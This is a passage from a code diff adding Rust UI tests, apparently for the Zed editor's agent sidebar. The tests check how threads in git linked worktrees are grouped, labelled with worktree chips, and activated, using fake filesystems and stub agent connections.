(multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread against a worktree path that doesn't exist yet. 
+ save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Thread is not visible yet — no worktree knows about this path. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " [+ New Thread]"] + ); + + // Now add the worktree to the git state and trigger a rescan. + fs.as_fake() + .add_linked_worktree_for_repo( + Path::new("/project/.git"), + true, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt/rosewood"), + ref_name: Some("refs/heads/rosewood".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project]", " Worktree Thread {rosewood}",] + ); +} + +#[gpui::test] +async fn test_two_worktree_workspaces_absorbed_when_main_added(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Create the main repo directory (not opened as a workspace yet). + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + }, + "src": {}, + }), + ) + .await; + + // Two worktree checkouts whose .git files point back to the main repo. 
+ fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-b"), + ref_name: Some("refs/heads/feature-b".into()), + sha: "bbb".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let project_a = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + let project_b = project::Project::test(fs.clone(), ["/wt-feature-b".as_ref()], cx).await; + + project_a.update(cx, |p, cx| p.git_scans_complete(cx)).await; + project_b.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + // Open both worktrees as workspaces — no main repo yet. + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx); + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_named_thread_metadata("thread-a", "Thread A", &project_a, cx).await; + save_named_thread_metadata("thread-b", "Thread B", &project_b, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Without the main repo, each worktree has its own header. 
+ assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " Thread A {wt-feature-a}", + " Thread B {wt-feature-b}", + ] + ); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(main_project.clone(), window, cx); + }); + cx.run_until_parked(); + + // Both worktree workspaces should now be absorbed under the main + // repo header, with worktree chips. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " Thread A {wt-feature-a}", + " Thread B {wt-feature-b}", + ] + ); +} + +#[gpui::test] +async fn test_threadless_workspace_shows_new_thread_with_worktree_chip(cx: &mut TestAppContext) { + // When a group has two workspaces — one with threads and one + // without — the threadless workspace should appear as a + // "New Thread" button with its worktree chip. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Main repo with two linked worktrees. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-b"), + ref_name: Some("refs/heads/feature-b".into()), + sha: "bbb".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Workspace A: worktree feature-a (has threads). 
+ let project_a = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + project_a.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + // Workspace B: worktree feature-b (no threads). + let project_b = project::Project::test(fs.clone(), ["/wt-feature-b".as_ref()], cx).await; + project_b.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b.clone(), window, cx); + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Only save a thread for workspace A. + save_named_thread_metadata("thread-a", "Thread A", &project_a, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Workspace A's thread appears normally. Workspace B (threadless) + // appears as a "New Thread" button with its worktree chip. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project]", + " [+ New Thread {wt-feature-b}]", + " Thread A {wt-feature-a}", + ] + ); +} + +#[gpui::test] +async fn test_multi_worktree_thread_shows_multiple_chips(cx: &mut TestAppContext) { + // A thread created in a workspace with roots from different git + // worktrees should show a chip for each distinct worktree name. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Two main repos. + fs.insert_tree( + "/project_a", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.insert_tree( + "/project_b", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Worktree checkouts. 
+ for repo in &["project_a", "project_b"] { + let git_path = format!("/{repo}/.git"); + for branch in &["olivetti", "selectric"] { + fs.add_linked_worktree_for_repo( + Path::new(&git_path), + false, + git::repository::Worktree { + path: std::path::PathBuf::from(format!("/worktrees/{repo}/{branch}/{repo}")), + ref_name: Some(format!("refs/heads/{branch}").into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + } + } + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Open a workspace with the worktree checkout paths as roots + // (this is the workspace the thread was created in). + let project = project::Project::test( + fs.clone(), + [ + "/worktrees/project_a/olivetti/project_a".as_ref(), + "/worktrees/project_b/selectric/project_b".as_ref(), + ], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread under the same paths as the workspace roots. + save_named_thread_metadata("wt-thread", "Cross Worktree Thread", &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Should show two distinct worktree chips. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [project_a, project_b]", + " Cross Worktree Thread {olivetti}, {selectric}", + ] + ); +} + +#[gpui::test] +async fn test_same_named_worktree_chips_are_deduplicated(cx: &mut TestAppContext) { + // When a thread's roots span multiple repos but share the same + // worktree name (e.g. both in "olivetti"), only one chip should + // appear. 
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+
+    fs.insert_tree(
+        "/project_a",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+    fs.insert_tree(
+        "/project_b",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    for repo in &["project_a", "project_b"] {
+        let git_path = format!("/{repo}/.git");
+        fs.add_linked_worktree_for_repo(
+            Path::new(&git_path),
+            false,
+            git::repository::Worktree {
+                path: std::path::PathBuf::from(format!("/worktrees/{repo}/olivetti/{repo}")),
+                ref_name: Some("refs/heads/olivetti".into()),
+                sha: "aaa".into(),
+                is_main: false,
+            },
+        )
+        .await;
+    }
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project = project::Project::test(
+        fs.clone(),
+        [
+            "/worktrees/project_a/olivetti/project_a".as_ref(),
+            "/worktrees/project_b/olivetti/project_b".as_ref(),
+        ],
+        cx,
+    )
+    .await;
+    project.update(cx, |p, cx| p.git_scans_complete(cx)).await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    // Thread with roots in both repos' "olivetti" worktrees.
+    save_named_thread_metadata("wt-thread", "Same Branch Thread", &project, cx).await;
+
+    multi_workspace.update_in(cx, |_, _window, cx| cx.notify());
+    cx.run_until_parked();
+
+    // Both worktree paths have the name "olivetti", so only one chip.
+    assert_eq!(
+        visible_entries_as_strings(&sidebar, cx),
+        vec![
+            "v [project_a, project_b]",
+            " Same Branch Thread {olivetti}",
+        ]
+    );
+}
+
+#[gpui::test]
+async fn test_absorbed_worktree_running_thread_shows_live_status(cx: &mut TestAppContext) {
+    // When a worktree workspace is absorbed under the main repo, a
+    // running thread in the worktree's agent panel should still show
+    // live status (spinner + "(running)") in the sidebar.
+    agent_ui::test_support::init_test(cx);
+    cx.update(|cx| {
+        cx.update_flags(false, vec!["agent-v2".into()]);
+        ThreadStore::init_global(cx);
+        ThreadMetadataStore::init_global(cx);
+        language_model::LanguageModelRegistry::test(cx);
+        prompt_store::init(cx);
+    });
+
+    let fs = FakeFs::new(cx.executor());
+
+    // Main repo with a linked worktree.
+    fs.insert_tree(
+        "/project",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    // Worktree checkout pointing back to the main repo.
+    fs.add_linked_worktree_for_repo(
+        Path::new("/project/.git"),
+        false,
+        git::repository::Worktree {
+            path: std::path::PathBuf::from("/wt-feature-a"),
+            ref_name: Some("refs/heads/feature-a".into()),
+            sha: "aaa".into(),
+            is_main: false,
+        },
+    )
+    .await;
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await;
+    let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await;
+
+    main_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+    worktree_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    // Create the MultiWorkspace with both projects.
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(worktree_project.clone(), window, cx)
+    });
+
+    // Add an agent panel to the worktree workspace so we can run a
+    // thread inside it.
+    let worktree_panel = add_agent_panel(&worktree_workspace, cx);
+
+    // Switch back to the main workspace before setting up the sidebar.
+    multi_workspace.update_in(cx, |mw, window, cx| {
+        let workspace = mw.workspaces().next().unwrap().clone();
+        mw.activate(workspace, window, cx);
+    });
+
+    // Start a thread in the worktree workspace's panel and keep it
+    // generating (don't resolve it).
+    let connection = StubAgentConnection::new();
+    open_thread_with_connection(&worktree_panel, connection.clone(), cx);
+    send_message(&worktree_panel, cx);
+
+    let session_id = active_session_id(&worktree_panel, cx);
+
+    // Save metadata so the sidebar knows about this thread.
+    save_test_thread_metadata(&session_id, &worktree_project, cx).await;
+
+    // Keep the thread generating by sending a chunk without ending
+    // the turn.
+    cx.update(|_, cx| {
+        connection.send_update(
+            session_id.clone(),
+            acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())),
+            cx,
+        );
+    });
+    cx.run_until_parked();
+
+    // The worktree thread should be absorbed under the main project
+    // and show live running status.
+    let entries = visible_entries_as_strings(&sidebar, cx);
+    assert_eq!(
+        entries,
+        vec![
+            "v [project]",
+            " [~ Draft]",
+            " Hello {wt-feature-a} * (running)",
+        ]
+    );
+}
+
+#[gpui::test]
+async fn test_absorbed_worktree_completion_triggers_notification(cx: &mut TestAppContext) {
+    agent_ui::test_support::init_test(cx);
+    cx.update(|cx| {
+        cx.update_flags(false, vec!["agent-v2".into()]);
+        ThreadStore::init_global(cx);
+        ThreadMetadataStore::init_global(cx);
+        language_model::LanguageModelRegistry::test(cx);
+        prompt_store::init(cx);
+    });
+
+    let fs = FakeFs::new(cx.executor());
+
+    fs.insert_tree(
+        "/project",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    fs.add_linked_worktree_for_repo(
+        Path::new("/project/.git"),
+        false,
+        git::repository::Worktree {
+            path: std::path::PathBuf::from("/wt-feature-a"),
+            ref_name: Some("refs/heads/feature-a".into()),
+            sha: "aaa".into(),
+            is_main: false,
+        },
+    )
+    .await;
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await;
+    let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await;
+
+    main_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+    worktree_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(worktree_project.clone(), window, cx)
+    });
+
+    let worktree_panel = add_agent_panel(&worktree_workspace, cx);
+
+    multi_workspace.update_in(cx, |mw, window, cx| {
+        let workspace = mw.workspaces().next().unwrap().clone();
+        mw.activate(workspace, window, cx);
+    });
+
+    let connection = StubAgentConnection::new();
+    open_thread_with_connection(&worktree_panel, connection.clone(), cx);
+    send_message(&worktree_panel, cx);
+
+    let session_id = active_session_id(&worktree_panel, cx);
+    save_test_thread_metadata(&session_id, &worktree_project, cx).await;
+
+    cx.update(|_, cx| {
+        connection.send_update(
+            session_id.clone(),
+            acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())),
+            cx,
+        );
+    });
+    cx.run_until_parked();
+
+    assert_eq!(
+        visible_entries_as_strings(&sidebar, cx),
+        vec![
+            "v [project]",
+            " [~ Draft]",
+            " Hello {wt-feature-a} * (running)",
+        ]
+    );
+
+    connection.end_turn(session_id, acp::StopReason::EndTurn);
+    cx.run_until_parked();
+
+    assert_eq!(
+        visible_entries_as_strings(&sidebar, cx),
+        vec!["v [project]", " [~ Draft]", " Hello {wt-feature-a} * (!)",]
+    );
+}
+
+#[gpui::test]
+async fn test_clicking_worktree_thread_opens_workspace_when_none_exists(cx: &mut TestAppContext) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+
+    fs.insert_tree(
+        "/project",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    fs.add_linked_worktree_for_repo(
+        Path::new("/project/.git"),
+        false,
+        git::repository::Worktree {
+            path: std::path::PathBuf::from("/wt-feature-a"),
+            ref_name: Some("refs/heads/feature-a".into()),
+            sha: "aaa".into(),
+            is_main: false,
+        },
+    )
+    .await;
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    // Only open the main repo — no workspace for the worktree.
+    let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await;
+    main_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await;
+    worktree_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx));
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    // Save a thread for the worktree path (no workspace for it).
+    save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await;
+
+    multi_workspace.update_in(cx, |_, _window, cx| cx.notify());
+    cx.run_until_parked();
+
+    // Thread should appear under the main repo with a worktree chip.
+    assert_eq!(
+        visible_entries_as_strings(&sidebar, cx),
+        vec!["v [project]", " WT Thread {wt-feature-a}"],
+    );
+
+    // Only 1 workspace should exist.
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()),
+        1,
+    );
+
+    // Focus the sidebar and select the worktree thread.
+    focus_sidebar(&sidebar, cx);
+    sidebar.update_in(cx, |sidebar, _window, _cx| {
+        sidebar.selection = Some(1); // index 0 is header, 1 is the thread
+    });
+
+    // Confirm to open the worktree thread.
+    cx.dispatch_action(Confirm);
+    cx.run_until_parked();
+
+    // A new workspace should have been created for the worktree path.
+    let new_workspace = multi_workspace.read_with(cx, |mw, _| {
+        assert_eq!(
+            mw.workspaces().count(),
+            2,
+            "confirming a worktree thread without a workspace should open one",
+        );
+        mw.workspaces().nth(1).unwrap().clone()
+    });
+
+    let new_path_list =
+        new_workspace.read_with(cx, |_, cx| workspace_path_list(&new_workspace, cx));
+    assert_eq!(
+        new_path_list,
+        PathList::new(&[std::path::PathBuf::from("/wt-feature-a")]),
+        "the new workspace should have been opened for the worktree path",
+    );
+}
+
+#[gpui::test]
+async fn test_clicking_worktree_thread_does_not_briefly_render_as_separate_project(
+    cx: &mut TestAppContext,
+) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+
+    fs.insert_tree(
+        "/project",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    fs.add_linked_worktree_for_repo(
+        Path::new("/project/.git"),
+        false,
+        git::repository::Worktree {
+            path: std::path::PathBuf::from("/wt-feature-a"),
+            ref_name: Some("refs/heads/feature-a".into()),
+            sha: "aaa".into(),
+            is_main: false,
+        },
+    )
+    .await;
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await;
+    main_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await;
+    worktree_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx));
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await;
+
+    multi_workspace.update_in(cx, |_, _window, cx| cx.notify());
+    cx.run_until_parked();
+
+    assert_eq!(
+        visible_entries_as_strings(&sidebar, cx),
+        vec!["v [project]", " WT Thread {wt-feature-a}"],
+    );
+
+    focus_sidebar(&sidebar, cx);
+    sidebar.update_in(cx, |sidebar, _window, _cx| {
+        sidebar.selection = Some(1); // index 0 is header, 1 is the thread
+    });
+
+    let assert_sidebar_state = |sidebar: &mut Sidebar, _cx: &mut Context<Sidebar>| {
+        let mut project_headers = sidebar.contents.entries.iter().filter_map(|entry| {
+            if let ListEntry::ProjectHeader { label, .. } = entry {
+                Some(label.as_ref())
+            } else {
+                None
+            }
+        });
+
+        let Some(project_header) = project_headers.next() else {
+            panic!("expected exactly one sidebar project header named `project`, found none");
+        };
+        assert_eq!(
+            project_header, "project",
+            "expected the only sidebar project header to be `project`"
+        );
+        if let Some(unexpected_header) = project_headers.next() {
+            panic!(
+                "expected exactly one sidebar project header named `project`, found extra header `{unexpected_header}`"
+            );
+        }
+
+        let mut saw_expected_thread = false;
+        for entry in &sidebar.contents.entries {
+            match entry {
+                ListEntry::ProjectHeader { label, .. } => {
+                    assert_eq!(
+                        label.as_ref(),
+                        "project",
+                        "expected the only sidebar project header to be `project`"
+                    );
+                }
+                ListEntry::Thread(thread)
+                    if thread.metadata.title.as_ref() == "WT Thread"
+                        && thread.worktrees.first().map(|wt| wt.name.as_ref())
+                            == Some("wt-feature-a") =>
+                {
+                    saw_expected_thread = true;
+                }
+                ListEntry::Thread(thread) => {
+                    let title = thread.metadata.title.as_ref();
+                    let worktree_name = thread
+                        .worktrees
+                        .first()
+                        .map(|wt| wt.name.as_ref())
+                        .unwrap_or("");
+                    panic!(
+                        "unexpected sidebar thread while opening linked worktree thread: title=`{title}`, worktree=`{worktree_name}`"
+                    );
+                }
+                ListEntry::ViewMore { .. } => {
+                    panic!("unexpected `View More` entry while opening linked worktree thread");
+                }
+                ListEntry::DraftThread { .. } | ListEntry::NewThread { .. } => {}
+            }
+        }
+
+        assert!(
+            saw_expected_thread,
+            "expected the sidebar to keep showing `WT Thread {{wt-feature-a}}` under `project`"
+        );
+    };
+
+    sidebar
+        .update(cx, |_, cx| cx.observe_self(assert_sidebar_state))
+        .detach();
+
+    let window = cx.windows()[0];
+    cx.update_window(window, |_, window, cx| {
+        window.dispatch_action(Confirm.boxed_clone(), cx);
+    })
+    .unwrap();
+
+    cx.run_until_parked();
+
+    sidebar.update(cx, assert_sidebar_state);
+}
+
+#[gpui::test]
+async fn test_clicking_absorbed_worktree_thread_activates_worktree_workspace(
+    cx: &mut TestAppContext,
+) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+
+    fs.insert_tree(
+        "/project",
+        serde_json::json!({
+            ".git": {},
+            "src": {},
+        }),
+    )
+    .await;
+
+    fs.add_linked_worktree_for_repo(
+        Path::new("/project/.git"),
+        false,
+        git::repository::Worktree {
+            path: std::path::PathBuf::from("/wt-feature-a"),
+            ref_name: Some("refs/heads/feature-a".into()),
+            sha: "aaa".into(),
+            is_main: false,
+        },
+    )
+    .await;
+
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await;
+    let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await;
+
+    main_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+    worktree_project
+        .update(cx, |p, cx| p.git_scans_complete(cx))
+        .await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(worktree_project.clone(), window, cx)
+    });
+
+    // Activate the main workspace before setting up the sidebar.
+ let main_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace.clone(), window, cx); + workspace + }); + + save_named_thread_metadata("thread-main", "Main Thread", &main_project, cx).await; + save_named_thread_metadata("thread-wt", "WT Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The worktree workspace should be absorbed under the main repo. + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 3); + assert_eq!(entries[0], "v [project]"); + assert!(entries.contains(&" Main Thread".to_string())); + assert!(entries.contains(&" WT Thread {wt-feature-a}".to_string())); + + let wt_thread_index = entries + .iter() + .position(|e| e.contains("WT Thread")) + .expect("should find the worktree thread entry"); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + main_workspace, + "main workspace should be active initially" + ); + + // Focus the sidebar and select the absorbed worktree thread. + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(wt_thread_index); + }); + + // Confirm to activate the worktree thread. + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // The worktree workspace should now be active, not the main one. + let active_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + assert_eq!( + active_workspace, worktree_workspace, + "clicking an absorbed worktree thread should activate the worktree workspace" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_with_saved_paths_activates_matching_workspace( + cx: &mut TestAppContext, +) { + // Thread has saved metadata in ThreadStore. A matching workspace is + // already open. Expected: activates the matching workspace. 
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(project_b.clone(), window, cx)
+    });
+    let workspace_a =
+        multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone());
+
+    // Save a thread with path_list pointing to project-b.
+    let session_id = acp::SessionId::new(Arc::from("archived-1"));
+    save_test_thread_metadata(&session_id, &project_b, cx).await;
+
+    // Ensure workspace A is active.
+    multi_workspace.update_in(cx, |mw, window, cx| {
+        let workspace = mw.workspaces().next().unwrap().clone();
+        mw.activate(workspace, window, cx);
+    });
+    cx.run_until_parked();
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()),
+        workspace_a
+    );
+
+    // Call activate_archived_thread – should resolve saved paths and
+    // switch to the workspace for project-b.
+    sidebar.update_in(cx, |sidebar, window, cx| {
+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: session_id.clone(),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "Archived Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: PathList::new(&[PathBuf::from("/project-b")]),
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx.run_until_parked();
+
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()),
+        workspace_b,
+        "should have activated the workspace matching the saved path_list"
+    );
+}
+
+#[gpui::test]
+async fn test_activate_archived_thread_cwd_fallback_with_matching_workspace(
+    cx: &mut TestAppContext,
+) {
+    // Thread has no saved metadata but session_info has cwd. A matching
+    // workspace is open. Expected: uses cwd to find and activate it.
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(project_b, window, cx)
+    });
+    let workspace_a =
+        multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone());
+
+    // Start with workspace A active.
+ multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_a + ); + + // No thread saved to the store – cwd is the only path hint. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.activate_archived_thread( + ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("unknown-session")), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "CWD Thread".into(), + updated_at: Utc::now(), + created_at: None, + folder_paths: PathList::new(&[std::path::PathBuf::from("/project-b")]), + main_worktree_paths: PathList::default(), + archived: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()), + workspace_b, + "should have activated the workspace matching the cwd" + ); +} + +#[gpui::test] +async fn test_activate_archived_thread_no_paths_no_cwd_uses_active_workspace( + cx: &mut TestAppContext, +) { + // Thread has no saved metadata and no cwd. Expected: falls back to + // the currently active workspace. 
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    let workspace_b = multi_workspace.update_in(cx, |mw, window, cx| {
+        mw.test_add_workspace(project_b, window, cx)
+    });
+
+    // Activate workspace B (index 1) to make it the active one.
+    multi_workspace.update_in(cx, |mw, window, cx| {
+        let workspace = mw.workspaces().nth(1).unwrap().clone();
+        mw.activate(workspace, window, cx);
+    });
+    cx.run_until_parked();
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()),
+        workspace_b
+    );
+
+    // No saved thread, no cwd – should fall back to the active workspace.
+    sidebar.update_in(cx, |sidebar, window, cx| {
